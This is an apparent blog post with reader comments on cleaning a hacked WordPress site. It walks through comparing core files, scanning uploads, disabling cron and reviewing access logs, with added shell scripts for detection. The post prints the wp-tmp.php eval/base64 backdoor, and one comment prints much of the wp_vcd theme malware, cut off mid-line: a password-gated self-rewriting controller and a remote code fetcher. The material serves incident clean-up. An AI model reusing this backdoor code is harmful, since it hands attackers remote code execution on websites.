In January, one of my websites was hacked. The symptom was that when I accessed the website, it only showed a white screen in the browser. I didn’t pay much attention to it and just restored the whole website from an earlier backup. However, that was only the beginning of the nightmare. One month later, all my websites on the same shared hosting were hacked. Now it had become a serious problem, and two of my websites were already flagged as “Malware code injection”. That is how my journey of cleaning hacked WordPress websites began.

How to Clean Hacked WordPress Website

All the hacked websites are powered by WordPress. I think it will be helpful to share my experience of how to find the hacked files in a WordPress website. There are several steps to find the hack code and clean a hacked WordPress website.

Find Suspicious Files in WordPress Website

To clean a hacked WordPress website, step 1 is finding all suspicious files in the hacked site. If you are familiar with WordPress, this is easy. If you are not, download the latest version of WordPress and compare its files with the files of your hacked website: anything that is not in the clean download, or that differs from it, deserves a close look. On my website, I found a file named “wp-tmp.php” in the root folder. This is the most common way hackers hide their backdoor script: a file whose name looks like a WordPress core file.

Suspicious file wp-tmp.php in Hacked WordPress Website

The “wp-tmp.php” file looks very similar to other WordPress files such as “wp-login.php” and “wp-settings.php”. However, “wp-tmp.php” is a backdoor: the hacker uses this file to run code on your WordPress website and inject malware into it. The “wp-tmp.php” looks like this:

<?php
// Whatever arrives in the "m" request parameter is base64-decoded and executed as PHP.
$p = $_REQUEST["m"]; eval(base64_decode($p));
?>

Backdoor in WordPress Uploads Folder

Step 2 to clean a hacked WordPress website is searching for harmful code in the uploads folder. The “wp-content/uploads” folder in WordPress is another place where hackers like to put their malware. Because the uploads folder contains all the media files we upload to our website, we do not delete this folder when we clean the hacked website, so anything hidden there survives a reinstall. So when you are cleaning a hacked WordPress site, you must search this folder for PHP files: a normal uploads folder holds only media.

Clean a Hacked WordPress Site in 5 Minutes

Step 3 to clean a hacked WordPress site is deleting all the hacked files. After I had found all the suspicious files in the hacked website, simply deleting those files was not enough. Many hackers also modify WordPress core files to inject harmful code into them. Hacked files of this type are very hard to find and clean. So the best way to clean your hacked WordPress website is to delete all the WordPress core files, keeping only the “wp-content” folder and the “wp-config.php” file in the root folder (back them up first).

Restore Clean WordPress System Files

Step 4 is restoring the WordPress core files. This step is quite simple: I downloaded the latest WordPress source code from wordpress.org and copied all the WordPress files to my website. Remember to upload your own “wp-content” folder and “wp-config.php” file, which you backed up in step 3.
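The file-system part of steps 1 to 4, as an added shell example that is not code from the original post. It assumes a clean download of the same WordPress version in one directory and the suspect site in another; the fixture it builds (file names, the injected line, the sample backdoor file) is constructed for the demonstration. It goes a little beyond comparing by hand: `diff -rq` reports modified core files as well as extra ones, and the uploads scan also catches `.phtml` and `.php5`-style names.

```shell
#!/bin/sh
# Added example (not code from the original post): a small triage and
# refresh script for steps 1 to 4. It assumes two directories: CLEAN, a
# fresh download of the same WordPress version from wordpress.org, and
# SITE, the suspect site. The fixture below is constructed for the demo;
# the injected line, file names and paths in it are made up.

# Step 1: report core files that differ from the clean download and files
# that exist only in the site. wp-content and wp-config.php are site-specific
# and are skipped here; they get their own checks below.
core_diff() {
  clean="$1"; site="$2"
  diff -rq -x wp-content -x wp-config.php "$clean" "$site" || true
}

# Step 2: the uploads folder should hold media only, so any PHP file
# there is suspect. Also catch variants such as .phtml and .php5.
find_php_in_uploads() {
  find "$1/wp-content/uploads" -type f \
    \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' \) 2>/dev/null
}

# Files anywhere in the site that carry the eval(base64_decode(...))
# pattern shown in wp-tmp.php above.
find_eval_base64() {
  grep -rlE 'eval[[:space:]]*\([[:space:]]*base64_decode' "$1" 2>/dev/null || true
}

# Steps 3 and 4: archive wp-content and wp-config.php (BACKUP must be an
# absolute path), remove everything else in the site root, then copy the
# clean core in. wp-content and wp-config.php stay in place, so the
# archive is only insurance.
refresh_core() {
  clean="$1"; site="$2"; backup="$3"
  ( cd "$site" && tar -cf "$backup" wp-content wp-config.php )
  find "$site" -mindepth 1 -maxdepth 1 \
    ! -name wp-content ! -name wp-config.php -exec rm -rf {} +
  cp -R "$clean/." "$site/"
}

# Constructed fixture: a two-file "clean" core and a "site" with a modified
# core file, an extra root file named like core, and a PHP file in uploads.
make_fixture() {
  root=$(mktemp -d)
  mkdir -p "$root/clean/wp-includes" "$root/site/wp-includes" \
           "$root/site/wp-content/uploads/2016/03"
  for d in clean site; do
    printf '<?php // core login script\n' > "$root/$d/wp-login.php"
  done
  printf '<?php // core user functions\n' > "$root/clean/wp-includes/user.php"
  printf '<?php // core user functions\n// injected line\n' > "$root/site/wp-includes/user.php"
  printf '<?php $p = $_REQUEST["m"]; eval(base64_decode($p));\n' > "$root/site/wp-tmp.php"
  printf '<?php // should not be here\n' > "$root/site/wp-content/uploads/2016/03/image.php"
  printf 'GIF89a\n' > "$root/site/wp-content/uploads/2016/03/photo.gif"
  printf '<?php define("DB_NAME", "wp");\n' > "$root/site/wp-config.php"
  echo "$root"
}

# Usage on a real site: sh triage.sh /path/to/clean-wordpress /path/to/site
if [ "$#" -eq 2 ]; then
  core_diff "$1" "$2"
  find_php_in_uploads "$2"
  find_eval_base64 "$2"
fi
```

Run `core_diff` once more after `refresh_core`: it should print nothing, which confirms the core now matches the clean download. The uploads folder and the theme and plugin folders under wp-content are not covered by this comparison and still need to be read through by hand.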

Stop WordPress Cron Job

Step 5 is stopping the WordPress cron job. Though this step may not be necessary, it is better for keeping your website safe. In my experience of cleaning hacked WordPress sites, some sophisticated hackers hide their injection code in the database and use the WordPress cron job to run this harmful code, which hacks your WordPress website again.

To stop the cron job in WordPress, add this line to the “wp-config.php” file:

define('DISABLE_WP_CRON', true);

Another way to stop the cron job is to rename or delete the “wp-cron.php” file. On my website I took both of the above actions. Note that DISABLE_WP_CRON only stops WordPress from triggering wp-cron.php on page loads; a direct request to wp-cron.php still runs the events that are due, which is why renaming or deleting the file matters as well.

Ask Google to Review Your Website

If your hacked website is already marked as a malware website by Google, you have to ask Google to review it. First, register your website with Google Webmaster. For more information, check this official Google document:

About malware, hacking, and infected sites

Prevent Your Website Being Hacked

After you have cleaned the hacked WordPress site successfully, you should keep watching the website for at least 2 or 3 days. Hackers will try their best to hack your website again when they find they have lost control of it. Therefore, it is very important to check the raw access log of your website. If your website is hacked again, at least you will find where the hackers walked in. Then you just repeat the above steps and close the backdoor. Keep watching the access log until there is no more suspicious access. Here is my raw access log example. The website was hacked again after I had cleaned it, so I deleted all the WordPress core files and stopped the cron job in WordPress.

[Screenshot: raw access log]

Avoid Brute Force Login

A brute force attack is the most common way to hack a website to get the username and password. Lots of people use brute force attack web services against WordPress-powered websites to get the admin username and password. Here is how it looks in the access log:

[Screenshot: brute force attack in the access log]

To keep our website safe, we must take some actions to protect it. Here is an article about how to avoid brute force attacks on the login page.
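The two things the post says to look for in the raw access log (repeated login attempts, and the attacker coming back for wp-tmp.php), as an added shell example that is not from the original post. It assumes an Apache combined-format log; the sample lines, IP addresses (documentation ranges) and user agents are constructed.

```shell
#!/bin/sh
# Added example (not from the original post): two checks over a raw access
# log in Apache "combined" format, the format most shared hosts offer for
# download. The log lines below are constructed for the demo and use
# documentation IP ranges, not real attacker addresses.

# Number of POST requests to the login endpoints (wp-login.php and
# xmlrpc.php) per client IP, busiest first. Field 6 is the quoted method,
# field 7 the request path.
login_post_counts() {
  awk '$6 == "\"POST" && ($7 ~ /^\/wp-login\.php/ || $7 ~ /^\/xmlrpc\.php/) { n[$1]++ }
       END { for (ip in n) print n[ip], ip }' "$1" | sort -rn
}

# IPs whose login POST count reaches the threshold: candidates for a
# brute-force login attempt, worth blocking or rate-limiting.
flag_bruteforce() {
  login_post_counts "$1" | awk -v t="$2" '$1 >= t { print $2 }'
}

# Requests for the backdoor file names mentioned on this page, printed as
# "ip path status". A run of 404s for wp-tmp.php after a clean-up is the
# attacker checking whether the backdoor is still there, as the comments
# below describe; a 200 means it is back.
backdoor_probes() {
  awk '$7 ~ /^\/(wp-tmp|wp-feed|wp-vcd)\.php/ { sub(/\?.*/, "", $7); print $1, $7, $9 }' "$1"
}

# Constructed sample log written to a temp file; returns its path.
make_sample_log() {
  log=$(mktemp)
  cat > "$log" <<'EOF'
203.0.113.5 - - [06/Mar/2016:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Mar/2016:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Mar/2016:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Mar/2016:10:00:04 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Mar/2016:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Mar/2016:10:00:06 +0000] "POST /wp-login.php HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
192.0.2.10 - - [06/Mar/2016:10:05:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.10 - - [06/Mar/2016:10:05:01 +0000] "GET /wp-admin/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Mar/2016:10:07:00 +0000] "GET /wp-tmp.php HTTP/1.1" 404 210 "-" "python-requests/2.9"
198.51.100.7 - - [06/Mar/2016:10:09:00 +0000] "GET /wp-tmp.php HTTP/1.1" 404 210 "-" "python-requests/2.9"
198.51.100.7 - - [06/Mar/2016:10:31:00 +0000] "GET /wp-tmp.php HTTP/1.1" 200 12 "-" "python-requests/2.9"
EOF
  echo "$log"
}

# Usage on a real log: sh logcheck.sh access.log [threshold]
if [ "$#" -ge 1 ]; then
  flag_bruteforce "$1" "${2:-20}"
  backdoor_probes "$1"
fi
```

On the sample, 203.0.113.5 is flagged with six login POSTs while the legitimate admin at 192.0.2.10 logs in once, and the probe list shows wp-tmp.php going from 404 to 200, which is the moment to go back to the file-system checks. The threshold is a judgement call: a single real user rarely posts the login form more than a handful of times in a row.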

Delete Unknown Account

What’s the simplest backdoor in a hacked website? The answer is an administrator account. That’s right. Please don’t forget to check whether there are unusual accounts in your website. It is very simple: just go to your website backend and check the account list. Delete all the accounts you don’t need.

Change Your Administrator Password

When your website is compromised, your username and password may already have leaked. In my hacked WordPress website, the file “wp-includes/user.php” was injected with hack code. I guess this injected code captures the plain-text username and password whenever we log in. Therefore, the last step to clean up your website is changing your administrator password.


17 Comments

  1. It seems like one of my clients has the same problem, with the same attacker (at least the IP came from the same network, HostSailor NL).

    1. Oh, really. In my website, the hacker left lots of PHP files in the wp-include folder and wp-admin folder. All these hack file names look like “edit_.php”, “user_.php”.

    1. I guess the backdoor may be in the cron job in the database, as my website was hacked again even after I replaced all WP files with fresh new ones.

      I watched the log file. At the beginning, the hacker tried to access wp-tmp.php and got a 404 error. Once my website ran the WordPress cron job, the hacker’s wp-tmp.php was back.

      So I guess the hacker injected the hack code into the cron job in WordPress, so I disabled the WordPress cron job and deleted the cron script completely.

      Currently, my website is running, but I can still see the hacker trying to break it. Quite scary.

  2. I have a Dragon Touch E70 tablet. I cannot open it because there is a message that adulate browser has stopped, so it prevents continuing to open the tablet. I have tried many times to reset the device to factory settings and tried to format it, but it is the same: the device is locked. Please help.

  3. Hello, I have similar problems. Even if I delete the 2 files wp-tmp.php and wp-feed.php, after one minute they appear again. I don’t want to do

    1. The hacker already put some backdoor script in your website, which may be hidden in a normal WordPress script or theme script.

    2. I have the same problem, the files regenerate automatically.
      I tried to clean the files by reinstalling the wp-includes and wp-admin folders.
      I also deleted the wp-cron.php file.

      Can’t find a solution right now. Did you?

      1. It’s highly possible the hacking code is hiding in a plugin file or theme file. That’s why all the problem files are regenerated automatically. Last time, I found the malware code in my theme file.

  4. Since I can’t recognize and find the malware, I will have to delete everything and make a new install of WordPress, the theme and every single plugin from a fresh install.

    I found a temporary solution to stop the scripts recreating themselves. I created 2 new files named “wp-tmp.php” and “wp-feed.php” with no code inside. Then I deleted the 2 respective files in my server folder, and quickly uploaded my 2 files to the same folder so that they can’t be recreated by the malware, since they already exist.

  5. I found the solution: look for functions.php in your theme folder. Open it and delete the first part of the code, which is the hacked part.
    (also google the word “go.pub2srv.com” to find more solutions)
    This is the code:

    <?php
    // Remote-control branch: only runs when the request carries the attacker's password.
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '35160fd9ce44b4c2a1c074cd994bf65a'))
    {
        $div_code_name="wp_vcd";
        switch ($_REQUEST['action'])
        {
            case 'change_domain';
                // Rewrites the download domain hard-coded inside this very file.
                if (isset($_REQUEST['newdomain']))
                {
                    if (!empty($_REQUEST['newdomain']))
                    {
                        if ($file = @file_get_contents(__FILE__))
                        {
                            if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                            {
                                $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                @file_put_contents(__FILE__, $file);
                                print "true";
                            }
                        }
                    }
                }
                break;
            case 'change_code';
                // Replaces the block between //$start_wp_theme_tmp and //$end_wp_theme_tmp in this file.
                if (isset($_REQUEST['newcode']))
                {
                    if (!empty($_REQUEST['newcode']))
                    {
                        if ($file = @file_get_contents(__FILE__))
                        {
                            if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                            {
                                $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                @file_put_contents(__FILE__, $file);
                                print "true";
                            }
                        }
                    }
                }
                break;
            default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
        }
        die("");
    }

    $div_code_name = "wp_vcd";
    $funcfile = __FILE__;
    if(!function_exists('theme_temp_setup')) {
        $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
        // Stays quiet on cron and XML-RPC requests, so the payload only runs on normal page views.
        if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
            function file_get_contents_tcurl($url)
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
                $data = curl_exec($ch);
                curl_close($ch);
                return $data;
            }
            function theme_temp_setup($phpCode)
            {
                // Writes fetched code to a temporary PHP file so that it can be included.
                $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
                $handle = fopen($tmpfname, "w+");
                fwrite($handle, "<?php

  6. Also look in the database for “wp-tmp” and you’ll find some other strings in the options table to remove.

  7. This occurs by using NULLED themes and plugins.

    You have to know that everything nulled is contaminated by malicious code.

    When a nulled theme or plugin is installed, the code wakes up at a certain moment, goes through all the folders of your hosting, and installs a script in addition to adding several files:

    wp-vcd.php
    wp-tmp.php

    AND ALSO modifies
    post.php
    functions.php
